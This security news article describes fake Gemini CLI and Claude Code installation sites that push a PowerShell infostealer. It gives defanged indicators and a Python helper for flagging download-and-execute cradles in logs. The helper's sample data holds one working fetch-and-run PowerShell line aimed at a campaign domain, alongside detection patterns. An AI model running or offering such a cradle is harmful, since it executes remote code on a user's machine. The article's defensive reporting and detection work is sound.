
Fake Gemini and Claude Code Sites Distribute Infostealers


New Malicious Campaign Exposed: Cyber Actors Create Fake Google Gemini and Anthropic Claude Code Sites to Distribute Infostealer Malware

Security researchers at EclecticIQ have recently identified a new and concerning malicious campaign. This operation involves threat actors who have crafted counterfeit websites that masquerade as Google Gemini’s coding tool and Anthropic’s Claude Code. The ultimate objective of these fake sites is to disseminate information-stealing malware.

The alarm was first raised by an independent security researcher, known by the handle @g0njxa on social media platforms. On April 21, @g0njxa took to X, formerly known as Twitter, to issue a warning about an impersonation campaign that exploits the Gemini command line interface (CLI). This feature permits developers to interact seamlessly with Gemini AI models directly from their terminal, making the impersonation especially dangerous.

Following this initial alert, EclecticIQ’s team decided to take a deeper look into the campaign based on the findings presented by @g0njxa. Their investigation revealed that the malicious domains associated with this threat began to emerge as early as March 2026.

Further analysis indicated that this campaign appears to be geographically tailored, targeting users specifically in the United States and the United Kingdom. This is evidenced by the attackers’ selection of top-level domains such as .co.uk, .us.com, and .us.org, which are commonly associated with these regions.

Infostealer Capabilities

In order to attract their intended victims, the threat actors employed SEO poisoning techniques. This strategy involves manipulating search engine results to elevate the fake domains above legitimate ones, effectively guiding unsuspecting users to compromised infrastructures that mimic the authentic installation pages for these AI tools.

Once targeted individuals follow the instructions on these domains, they end up running an infostealer built specifically for Windows endpoints. The malware executes entirely in memory through PowerShell. Its primary function is to harvest sensitive information and credentials from a wide range of applications and then send the exfiltrated data, encrypted before transmission, to a command-and-control (C2) server.

The researchers at EclecticIQ pointed out that the scope of data collection by this infostealer clearly indicates a targeted approach, focusing heavily on enterprise users and developer workstations. A wide range of applications is in the malware’s crosshairs, including both Chromium-family browsers—such as Chrome, Edge, and Brave—and Firefox. It diligently extracts login credentials, session cookies, autofill data, and browsing history.

In addition to web browsers, the malware targets ubiquitous collaboration and communication tools that are standard in corporate environments. Among the platforms targeted are:

According to EclecticIQ, acquiring a session cookie or local state key from any of these applications provides the attacker with authenticated access to the victim’s workspace. This access includes internal channels, shared files, client communications, and connected integrations.

Moreover, the infostealer gathers additional information from remote access tools, OpenVPN configuration files, cryptocurrency wallets, cloud storage (including services like Proton Drive, iCloud Drive, Google Drive, MEGA, and OneDrive), as well as user files and system metadata. One of the most alarming features of this malware is its ability to enable remote code execution, allowing attackers to perform arbitrary tasks on the compromised device. Financially motivated cybercriminals often utilize this capability to escalate their attacks, leading to more invasive intrusions.

Gemini CLI Attack Chain

Victims who believe they are visiting the authentic Gemini CLI site land on a fraudulent installation page, geminicli[.]co[.]com, which superficially presents legitimate-looking installation instructions. The page instructs users to paste a PowerShell command into their terminal. When executed, the command connects to gemini-setup[.]com to download the infostealer's downloader payload.

After the download is complete, the infostealer connects to a C2 server hosted at events[.]msft23[.]com, which is used to receive the exfiltrated data from the compromised systems.

Claude Code Attack Chain

On March 30, researchers at EclecticIQ identified the registration of two additional domains that impersonate Claude Code: claudecode[.]co[.]com and claude-setup[.]com. Following a similar pattern to that of the Gemini CLI impersonation, the malicious domain claudecode[.]co[.]com hosts a page that mimics Anthropic’s official documentation visually. This page also instructs users to execute a PowerShell command for ‘installation,’ whereas claude-setup[.]com serves as the host for the final payload.

Once executed, the infostealer sends the collected data to events[.]ms709[.]com, which functions as the C2 server for the Claude Code impersonation campaign. The similarities between these two attack chains strongly imply that a single threat actor is orchestrating both operations.
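Both attack chains described above share one shape: a pasted PowerShell one-liner fetches a remote script, runs it in memory, and the stealer then talks to a C2 domain. The following triage helper is an added example written for this article (not EclecticIQ's tooling) that scores PowerShell script-block log entries on exactly those two signals, a generic download-and-execute-in-memory cradle and the defanged domains the write-up names; the sample log lines are constructed, not captured from the campaign.

```python
import re
from dataclasses import dataclass, field

# Indicators as published in the write-up, defanged with "[.]".
DEFANGED_IOCS = [
    "geminicli[.]co[.]com", "gemini-setup[.]com", "events[.]msft23[.]com",
    "claudecode[.]co[.]com", "claude-setup[.]com", "events[.]ms709[.]com",
]

def refang(indicator: str) -> str:
    """Restore a defanged indicator to the form it takes in real logs."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")

IOCS = {refang(i) for i in DEFANGED_IOCS}

# Generic cradle heuristics: a remote fetch combined with in-memory execution,
# which is how the article says the stealer runs (entirely in memory via PowerShell).
FETCH = re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b", re.I)
EXEC_IN_MEMORY = re.compile(r"Invoke-Expression|\biex\b|\[Reflection\.Assembly\]::Load|-EncodedCommand|\s-e(nc)?\s", re.I)
HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)

@dataclass
class Verdict:
    severity: str                      # "high", "medium" or "none"
    reasons: list = field(default_factory=list)

def triage(script_block: str) -> Verdict:
    """Score one script-block (Event ID 4104 style) text: known campaign
    domain => high; fetch + in-memory execution with unknown host => medium."""
    reasons = []
    hosts = {h.lower() for h in HOST.findall(script_block)}
    hits = sorted(h for h in hosts if h in IOCS or any(h.endswith("." + i) for i in IOCS))
    if hits:
        reasons.append("known campaign domain: " + ", ".join(hits))
    cradle = bool(FETCH.search(script_block)) and bool(EXEC_IN_MEMORY.search(script_block))
    if cradle:
        reasons.append("remote fetch combined with in-memory execution")
    severity = "high" if hits else ("medium" if cradle else "none")
    return Verdict(severity, reasons)

# Constructed sample script blocks (hypothetical paths and hosts, not real captures).
SAMPLE_SCRIPT_BLOCKS = [
    "iex (New-Object Net.WebClient).DownloadString('https://gemini-setup.com/HYPOTHETICAL.ps1')",
    "iwr https://tools.example-internal.corp/setup.ps1 -OutFile setup.ps1",  # fetch only
    "Invoke-RestMethod https://cdn.example.net/x | Invoke-Expression",        # cradle, unknown host
    "Get-ChildItem C:\\Projects | Measure-Object",                            # benign
]

if __name__ == "__main__":
    for block in SAMPLE_SCRIPT_BLOCKS:
        v = triage(block)
        print(f"{v.severity:6} {block[:60]}  {v.reasons}")
```

The medium tier exists because a fetch-and-execute cradle from an unknown host is exactly what a not-yet-published staging domain would look like; the high tier only catches domains already known from the report.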

Conclusion

In summary, this campaign shows how a trusted developer workflow, pasting an installation command from a documentation page, can be turned into an infostealer delivery channel, and it highlights the ongoing need for vigilance among users, particularly in enterprise settings. The targeting and sophistication of these attacks underscore the importance of robust security practices to safeguard sensitive information. Both individuals and organizations need to remain informed and proactive in their cybersecurity efforts.
